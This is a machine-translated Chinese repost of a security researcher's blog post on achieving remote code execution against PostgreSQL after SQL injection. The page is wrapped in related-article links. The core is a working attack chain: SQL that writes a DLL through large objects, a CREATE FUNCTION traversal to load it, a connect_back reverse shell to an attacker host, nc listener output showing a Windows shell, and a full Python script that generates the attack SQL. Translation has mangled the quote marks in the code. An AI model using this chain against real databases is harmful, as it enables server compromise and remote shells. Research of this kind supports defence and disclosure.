SQL注入双Uppercut :: 如何实现针对PostgreSQL的远程代码执行

最新推荐文章于 2022-10-13 10:54:50 发布
最新推荐文章于 2022-10-13 10:54:50 发布
阅读量153 收藏
点赞数
文章标签: postgresql sql 数据库
原文链接:https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html
版权

当我研究Cisco DCNM 中发现的 SQL 注入漏洞的利用原语时,我遇到了一种通用技术来利用 SQL 注入漏洞攻击 PostgreSQL 数据库。在开发您的漏洞利用原语时,总是倾向于使用不依赖其他底层技术的应用程序技术。
TL; 博士; 我分享了另一种技术来实现对 PostgreSQL 数据库的远程代码执行。

应用程序技术是能够破坏数据库完整性并利用应用程序代码和数据库之间的信任。就 Cisco DCNM 而言,我发现了 4 种不同的技术,其中 2 种我在博客中介绍过(目录遍历和反序列化)。

先前的研究
虽然我当时并不知道,Jacob Wilkin已经报告了一种更简单的方法来实现对 PostgreSQL 的代码执行,方法是 (ab) using copy from program。最近,Denis Andzakovic 还详细介绍了他通过(ab)使用对postgresql.conf文件的读/写来获得针对 PostgreSQL 的代码执行的方法。

我本来打算坐这个技术,但自从丹尼斯暴露了lo_export剥削的力量,我想在棺材上再钉一颗也不会痛;->

我做了一些测试,发现在windows下,NETWORK_SERVICE不能修改postgresql.conf文件,所以Denis的技术是*nix特定的。但是,他的技术不需要堆叠查询,因此在某些情况下非常强大。

CREATE FUNCTION obj_file 目录遍历
CVE:不适用
CVSS: 4.1 (AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L)
环境
这种技术适用于 *nix 和 Windows,但确实需要堆叠查询,因为我们正在利用create 函数操作。

概括
在最新版本的 PostgreSQL 上,superuser不再允许从C:\Program Files\PostgreSQL\11\libWindows 或/var/lib/postgresql/11/lib*nix之外的任何其他地方加载共享库文件。此外,此路径不可由 NETWORK_SERVICE 或 postgres 帐户写入。

但是,经过身份验证的数据库superuser可以使用“大对象”将二进制文件写入文件系统,当然也可以写入C:\Program Files\PostgreSQL\11\data目录。这样做的原因应该很清楚,用于更新/创建数据库中的表。

潜在的问题是CREATE FUNCTION操作员允许目录遍历到数据目录!所以本质上,经过身份验证的攻击者可以将共享库文件写入数据目录并使用遍历加载共享库。这意味着攻击者可以执行本机代码,从而执行任意代码。

攻击流程
阶段 1 -我们首先在pg_largeobject表中创建一个条目。

select lo_import(‘C:/Windows/win.ini’, 1337);
我们可以在此处轻松使用 UNC 路径(并跳过步骤 3),但由于我们想要一种独立于平台的技术,我们将避免这种情况。

阶段 2 -现在我们修改pg_largeobject条目以包含完整的扩展。此扩展需要针对目标 PostgreSQL 数据库的确切主要版本进行编译,并与其架构相匹配。

对于长度大于 2048 字节的文件,该pg_largeobject表使用该pageno字段。所以我们必须将我们的文件分成大小为 2048 字节的块。

update pg_largeobject SET pageno=0, data=decode(4d5a90…) where loid=1337;
insert into pg_largeobject(loid, pageno, data) values (1337, 1, decode(74114d…));
insert into pg_largeobject(loid, pageno, data) values (1337, 2, decode(651400…));

通过在 PostgreSQL 中使用对象标识符类型,可能可以跳过阶段 1(并且仅对阶段 2 执行单个语句执行),但我没有时间确认这一点。

第 3 阶段 -现在我们可以将二进制文件写入数据目录。请记住,我们不能在这里使用遍历,因为它已被检查,但即使我们可以,NETWORK_SERVICE 帐户的严格文件权限也存在,我们的选择有限。

select lo_export(1337, ‘poc.dll’);
第 4 阶段 -现在,让我们触发库的加载。

我在几年前教过的一堂课中演示过,您可以使用固定路径(包括 UNC)来加载针对 PostgreSQL 9.x 版的扩展,从而获得本机代码执行。@zerosum0x0 通过在文件系统上使用具有固定路径的文件写入技术来证明这一点。但当时,文件系统的权限并没有那么严格。

create function connect_back(text, integer) returns void as ‘//attacker/share/poc.dll’, ‘connect_back’ language C strict;
然而,几年过去了,PostgreSQL 开发人员决定阻止固定路径,唉,这种技术现在已经死了。但是我们可以简单地从 lib 目录遍历并加载我们的扩展!create function附加.dll字符串的底层代码,所以不要担心附加它:

create function connect_back(text, integer) returns void as ‘…/data/poc’, ‘connect_back’ language C strict;
第 5 阶段 -触发您的反向 shell。

select connect_back(‘192.168.100.54’, 1234);
需要考虑的事项
您也可以加载 DllMain,但查看错误日志是检测的单程票!
如前所述,您需要使用相同的 PostgreSQL 版本(包括架构)编译 dll/so 文件。
你可以下载我在这里使用的扩展,但你需要自己编译它。
有趣的事实
ZDI 最初获得了这个案例,但从未发布过公告,后来我被告知供应商没有修补这个问题,因为它被认为是一个功能而不是一个错误。

自动化
此代码将生成一个 poc.sql 文件,以超级用户身份在数据库上运行。例子:

steven@pluto:~/postgres-rce$ ./poc.py
(+) usage ./poc.py <dll/so>
(+) eg: ./poc.py 192.168.100.54 1234
steven@pluto:~/postgres-rce$ ./poc.py 192.168.100.54 1234 si-x64-12.dll
(+) building poc.sql file
(+) run poc.sql in PostgreSQL using the superuser
(+) for a db cleanup only, run the following sql:
SELECT lo_unlink(l.oid) FROM pg_largeobject_metadata l;
DROP FUNCTION connect_back(text, integer);
steven@pluto:~/postgres-rce$ nc -lvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 192.168.100.122 49165 received!
Microsoft Windows [Version 6.3.9600]
© 2013 Microsoft Corporation. All rights reserved.

C:\Program Files\PostgreSQL\12\data>whoami
nt authority\network service

C:\Program Files\PostgreSQL\12\data>
#!/usr/bin/env python3
import sys

if len(sys.argv) != 4:
print("(+) usage %s <dll/so>" % sys.argv[0])
print("(+) eg: %s 192.168.100.54 1234 si-x64-12.dll" % sys.argv[0])
sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
lib = sys.argv[3]
with open(lib, “rb”) as dll:
d = dll.read()
sql = “select lo_import(‘C:/Windows/win.ini’, 1337);”
for i in range(0, len(d)//2048):
start = i * 2048
end = (i+1) * 2048
if i == 0:
sql += “update pg_largeobject set pageno=%d, data=decode(’%s’, ‘hex’) where loid=1337;” % (i, d[start:end].hex())
else:
sql += “insert into pg_largeobject(loid, pageno, data) values (1337, %d, decode(’%s’, ‘hex’));” % (i, d[start:end].hex())
if (len(d) % 2048) != 0:
end = (i+1) * 2048
sql += “insert into pg_largeobject(loid, pageno, data) values (1337, %d, decode(’%s’, ‘hex’));” % ((i+1), d[end:].hex())

sql += “select lo_export(1337, ‘poc.dll’);”
sql += “create function connect_back(text, integer) returns void as ‘…/data/poc’, ‘connect_back’ language C strict;”
sql += “select connect_back(’%s’, %d);” % (host, port)
print("(+) building poc.sql file")
with open(“poc.sql”, “w”) as sqlfile:
sqlfile.write(sql)
print("(+) run poc.sql in PostgreSQL using the superuser")
print("(+) for a db cleanup only, run the following sql:")
print(" select lo_unlink(l.oid) from pg_largeobject_metadata l;")
print(" drop function connect_back(text, integer);")

''FW
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)
SoulCat
05-27 4059
PostgreSQL 高权限命令执行漏洞(CVE-2019-9193) 最美好的大概还是那些初识的日子,是对彼此不全然地了解又极度渴望了解的那段时光。 漏洞概述: PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执...
uppercut:KnockoutJS助手
05-12
用法使用nuget或bower安装uppercut。 凉亭: bower install uppercut Nuget : Install-Package uppercutjs uppercutjs种类和 存储可还原为原始值的副本的可观察对象。 在需要编辑功能的地方编写编辑表单时非常有用...
pgsql数据库加密解密
最新发布
qq_41172258的博客
10-13 2940
介绍postgresql的加密及解密方法
PostgreSQL】PG通过SQL语句读取二进制bytea类型并进行二进制和十六进制转换
USTSD的博客
09-09 2222
1、将二进制编码为十六进制 select encode("AUUID_0",'hex'),"AUUID_0" from wxf_test."ABANK"; 2、将十六进制解码为二进制 select DECODE('8560377a6d2bf34ab1f2784adc78f500','hex')
postgresql图片等二进制数据的存储(copy命令,bytea类型)
djskl的专栏
04-13 1万+
COPY语句 COPY table_name [ ( column_name [, ...] ) ] FROM { 'filename' | STDIN } [ [ WITH ] ( option [, ...] ) ] COPY { table_name [ ( column_name [, ...] ) ] | ( query ) } TO { 'filename'
PostgreSQL中的大对象
HighGO
10-18 4820
PostgreSQL具有大对象的功能,它提供了对于存储在一个特殊大对象结构中的用户数据的流式访问。 所有的大对象都存在一个名为pg_largeobject的系统表中。每一个大对象还在系统表pg_largeobject_metadata中有一个对应的项。大对象可以通过类似于标准文件操作的读/写API来进行创建、修改和删除。 自PostgreSQL 9.0起,读取一个大对象需要SELECT权限,而...
toml.cr:适用于Crystal的TOML解析器
05-24
name = "Lance Uppercut" dob = 1979-05-27T07:32:00Z ) toml = TOML .parse(toml_string) puts toml[ " title " ] # => "TOML Example" owner = toml[ " owner " ].as( Hash ) puts owner[
toml:Golang 的 TOML 解析器和编码器库
07-24
Boom.title = " TOML Example "[ owner ]name = " Lance Uppercut "dob = 1979-05-27T07:32:00-08:00 # First class dates? Why not?[ database ]server = " 192.168.1.1 "ports = [ 8001 , 8001 , 8002 ]...
sql语句操作PostgreSQL大对象类型
beyondchx的专栏
04-03 1345
1.创建表:(用保留字OID定义大对象字段) CREATE TABLE test (   id serial NOT NULL,   value1 oid ) 2.大对象操作 在PostgreSQL中,可以利用函数lo_import()将大对象插入到数据库中,利用lo_export()函数从数据库中取出大对象,函数lo_unlink()可以删除大对象。 (1)插入: IN
PostgreSQL函数和运算符(一)
weixin_33949359的博客
05-24 166
PostgreSQL函数和运算符(一) 分类:PostgreSQL2011-03-17 09:143404人阅读评论(1)收藏举报 postgresqlstringwindowsencoding正则表达式hex 目录(?)[+] PostgreSQL为内置数据类型提供了大量的函数和运算符。用户也可以定义自己的函数(参考第11章)。在psql中...
postgresql常用技术(一、函数运算符)
lihaiyong92的博客
06-07 5022
1.数学运算符 运算符 描述 例子 结果 + 加 2 + 3 5 - 减 2 - 3 -1 * 乘 2 * 3 6 / 除 (两个整数相除的结果如果不是整数,会将结果的小数
PostgreSql(文件读取写入、命令执行的办法)
lansefly1990的专栏
11-07 8168
copy from:http://www.91ri.org/6507.html 1,文件读取/写入 PostgreSQL 8.1 以后提供了一组现成的文件操作函数 pg_logdir_ls()、pg_ls_dir()、pg_file_rename()、pg_file_write()、 pg_read_file()、pg_length_file(),用这些就可以胡作非为了?你错了。。。 可以用这个...
postgresql encode函数
hehe591246的博客
11-15 3658
encode(databytea,formattext) 将二进制数据编码成一个文本表达。支持的格式有:base64、hex、escape。escape将零字节和高位组字节转换为八进制序列(\nnn)和写的反斜线。 select encode('123456','base64'); 结果为:MTIzNDU2 遇到问题是数据库表中有一个字段为int4 select encode(字段,'base64'); 报错SQL 错误 [42883]: 错误: 函数 encode(intege...
POSTGRESQL 字符串操作函数
anju2054的博客
08-04 724
函数:string || string  说明:String concatenation 字符串连接操作 例子:'Post' || 'greSQL' = PostgreSQL 函数:string || non-string or non-string || string 说明:String concatenation with one non-string input 字...
6-23漏洞利用-postgresql代码执行利用
山兔的博客
07-31 695
修复在postgresql出现问题的时候,升级版本,避免出现安全事故,同时也要对默认安装好的软件,进行安全配置,防止默认配置造成的安全隐患,在实际的生产环境当中,我们无法做到快速升级版本,一个东西可能涉及的软件,还有很多,这个时候,我们采用更多的是,安全配置,以及防御的方式,来防止,我们这种软件,受到安全威胁。防御屏蔽任意IP连接postgresql,指定具体的IP地址,来连接postgresql,在一定程度上防御了远程位置IP,连接postgresql的风险。...
python 字符串 decode('hex') encode('hex')
热门推荐
abc
03-09 3万+
代码:# -*- coding:utf-8 -*-str = '\x35'.encode('hex')print strstr = '5'.encode('hex')print strstr = '56'.encode('hex')print strstr = '37'.decode('hex')print str str = '3738'.decode('hex')print str#str =
PostgreSQL 远程代码执行漏洞分析及利用—【CVE-2018-1058】
3569
03-07 2773
https://xianzhi.aliyun.com/forum/topic/2109漏洞描述A flaw was found in the way Postgresql allowed a user to modify the behavior of a query for other users. An attacker with a user account could use this f...
preparedstatement打印sql语句_SQL注入攻击,吓死宝宝了
weixin_39526872的博客
12-05 337
SQL注入攻击,是黑客对数据库进行攻击的常用手段之一。那么,什么是SQL注入SQL注入是怎么发生的?如何防止SQL注入?我们今天就来了解一下!总结:一、所谓SQL注入,是将客户机提交或Web表单递交的数据,拼接成SQL语句字符串时。如果客户端提交的数据有非法字符或SQL语句关键字时,会造成执行SQL语句语法错误,或执行结果不正确的情况。通过SQL注入,黑客可以最终达到欺骗服务器,执行恶意的SQ...
漏洞复现之PostgreSQL任意命令执行(CVE-2019-9193)及被勒索回忆
qq_31042199的博客
08-15 1890
为了复现这样一个漏洞需要首先配置目标靶机,整体测试环境如下: 漏洞名称 CVE-2019-9193 漏洞影响PostgreSQL版本 9.3-11.2 漏洞影响平台 windows+Linux+Mac OS 测试硬件环境 win10(家庭版) 虚拟机版本 ubuntu18.04 本次PostgreSQL版本 10.18 win10与ubuntu虚拟机连接方式 桥接 kali攻击机ip 192.168.31.68 靶机ip
【CVE-2022-21724】PostgreSQL JDBC 驱动远程代码执行
whoami
02-21 2910
PostgreSQL JDBC 驱动远程代码执行

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值